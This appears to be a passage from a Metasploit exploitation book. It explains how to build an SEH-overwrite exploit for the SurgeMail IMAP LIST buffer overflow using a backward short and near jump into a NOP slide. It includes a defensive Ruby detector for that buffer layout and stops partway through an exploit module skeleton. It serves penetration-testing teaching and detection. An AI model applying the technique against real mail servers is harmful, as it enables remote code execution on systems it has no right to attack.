Chapter 14
Hopping Around SEH Restrictions
Following the SEH overwrite, there’s very little space for shellcode before the end of the stack. Normally, a POP-POP-RETN set of instructions would be used to reach the Next SEH (NSEH), followed by a short jump forward into the shellcode. We’ll overcome this limited space restriction by developing an exploit to use as much space as possible for our final payload. At this point, we are done with the fuzzing process and we’ll move into developing an exploit for the vulnerability that we found.
This exploit would be a good candidate for an egg hunter, which is a small segment of shellcode that searches memory for the main payload; however, we’ll use a different tactic and overwrite SEH with the POP-POP-RETN instruction pointer. Once that’s overwritten we’ll make a short jump backward that requires very few instructions (rather than jumping forward). Next, we’ll use the space gained in the short jump to execute the larger near jump farther back into a NOP slide and shellcode. Although it’s not required, a NOP slide is always a good addition to an exploit, because it gives you a little room for error should the buffer position change in memory. NOPs will have no adverse impact on the exploit code and will act as filler. Conceptually, the attack will look like this:
[Buffer of garbage | NOP Slide | Shellcode | Near Jump | Short Jump | POP-POP-RETN]
To ensure portability of the exploit across different versions of Windows, use a return address from an application DLL or executable. In this case, only the application executable itself is available, so you can try to accomplish a three-byte overwrite of SEH using a POP-POP-RETN sequence of instructions from the surgemail.exe file. If this can be done successfully, the exploit will be universal across versions of Windows.
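The buffer layout above has a recognizable shape that a defender can look for in captured IMAP traffic. The following Ruby is an added example, not code from the book or from Metasploit: it takes the argument of a LIST command, decodes the short and near x86 jumps the layout depends on, and reports whether the chain jumps backward into a NOP slide behind an oversized argument. The sample buffer, the 512-byte size threshold, the inert "S" and "PPR!" placeholders, and all function names are constructed assumptions.

```ruby
NOP_BYTE  = 0x90
SHORT_JMP = 0xEB   # x86 JMP rel8
NEAR_JMP  = 0xE9   # x86 JMP rel32
MAX_SANE_LIST_ARG = 512   # assumption: real mailbox names are far shorter than this

# Return the argument of an IMAP LIST command ("tag LIST ref mailbox"), or nil.
# Assumption: arguments are space separated and not sent as IMAP literals.
def list_argument(line)
  _tag, cmd, arg = line.b.split(' ', 3)
  cmd && cmd.upcase == 'LIST' ? arg.to_s : nil
end

# Decode an x86 JMP at +off+ and return [instruction length, target offset], or nil.
def decode_jump(buf, off)
  size, fmt = { SHORT_JMP => [1, 'c'], NEAR_JMP => [4, 'l<'] }[buf.getbyte(off)]
  return nil unless size
  disp = buf.byteslice(off + 1, size)
  return nil unless disp && disp.bytesize == size
  [1 + size, off + 1 + size + disp.unpack1(fmt)]
end

# Locate the longest run of NOP bytes; returns [start offset, length].
def longest_nop_run(buf)
  best, run_start = [0, 0], nil
  buf.each_byte.with_index do |b, i|
    (run_start = nil; next) unless b == NOP_BYTE
    run_start ||= i
    best = [run_start, i - run_start + 1] if i - run_start + 1 > best[1]
  end
  best
end

# Indicators of the chapter's layout: a short JMP right before the 4-byte SEH
# handler overwrite, jumping backward onto a near JMP that lands in the NOP slide.
def seh_layout_indicators(arg)
  nop_start, nop_len = longest_nop_run(arg)
  result = { oversized: arg.bytesize > MAX_SANE_LIST_ARG, nop_run: nop_len, backward_chain: false }
  short_at = arg.bytesize - 4 - 2
  return result if short_at < 0
  _len, hop = decode_jump(arg, short_at)
  return result unless hop && hop < short_at          # first hop must go backward
  _len, target = decode_jump(arg, hop)
  return result unless target && target < hop         # second hop must go backward too
  result[:backward_chain] = target.between?(nop_start, nop_start + nop_len - 1)
  result
end

# Constructed sample in the chapter's shape; "S" bytes and "PPR!" are inert placeholders.
def build_sample_buffer
  nops, filler = NOP_BYTE.chr.b * 64, 'S'.b * 40
  near  = [NEAR_JMP, -(5 + filler.bytesize + nops.bytesize)].pack('Cl<')  # back to NOP slide
  short = [SHORT_JMP, -7].pack('Cc')                                      # back onto near JMP
  'A'.b * 1000 + nops + filler + near + short + 'PPR!'.b
end
```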
Let’s move on to creating the actual exploit for the SurgeMail vulnerability. Following is our initial skeleton exploit module to be saved in /root/.msf3/modules/exploits/windows/imap/:
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Imap

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Surgemail 3.8k4-4 IMAPD LIST Buffer Overflow',
      'Description' => %q{
        This module exploits a stack overflow in the Surgemail IMAP Server
        version 3.8k4-4 by sending an overly long LIST command. Valid IMAP
        account credentials are required.
      },
      'Author'      => [ 'ryujin' ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 1 $',